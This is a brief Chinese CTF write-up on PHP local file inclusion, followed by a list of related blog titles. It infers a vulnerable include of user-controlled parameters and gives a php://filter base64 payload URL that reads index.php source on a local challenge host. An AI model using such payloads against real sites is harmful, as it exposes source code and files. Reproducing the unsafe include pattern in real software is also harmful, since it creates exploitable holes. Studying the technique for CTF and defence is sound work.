CTF web题总结--LFI
来源:互联网 发布:空间自动留言软件 编辑:程序博客网 时间:2024/06/01 08:50
本地文件包含漏洞(Local File Include),是php的include()函数存在设计缺陷,学习链接:php文件包含漏洞总结
题目的url都是类似这种:
http://127.0.0.1/web500/index.php?action=front&mode=indexhttp://127.0.0.1/web500/index.php?action=front&mode=newnotehttp://127.0.0.1/web500/index.php?action=front&mode=delete
猜想后台代码可能是这样:
include $action.'/'.$mode.'.php'
于是利用文件包含获取index.php源码:
http://127.0.0.1/web500/index.php?action=php://filter/read=convert.base64‐encode/resource=./&mode=index
阅读全文
0 0
- CTF web题总结--LFI
- CTF web题总结--SSRF
- CTF web题总结--unserizable
- CTF web题总结--绕过正则表达式
- CTF web题总结--上传文件绕过
- CTF web题总结--任意文件下载
- CTF web题总结--php函数漏洞
- CTF web题总结--爆破用户名密码
- CTF web总结
- CTF web总结
- CTF web总结(入门)
- CTF web总结--sql注入
- CTF web题总结--http header 修改、cookie注入
- LFI漏洞利用总结
- ctf做题总结
- CTF web总结--利用mysql日志getshell
- ctf-web--总结几点基础题的做题思路
- 南邮CTF练习题——web题
- AOP--Aspect Oriented Programming
- 1006. 换个格式输出整数 (15)用时9min一次通过
- Bootstrap 模态框(Modal)插件
- 接入sdk 采用aar jar 插件方式踩坑
- Chrome Extension notifications【谷歌浏览器扩展之弹窗通知】
- CTF web题总结--LFI
- static与extern
- 分享一个我的android红白机
- Java中集合Set的用法
- Python3《机器学习实战》学习笔记(六):Logistic回归基础篇之梯度上升算法
- Ubuntu10下Apache-2.2安装
- JDK源码解析集合篇--综述
- 物联网NB-IoT与LoRa技术对比
- 关于System.out.println(obj);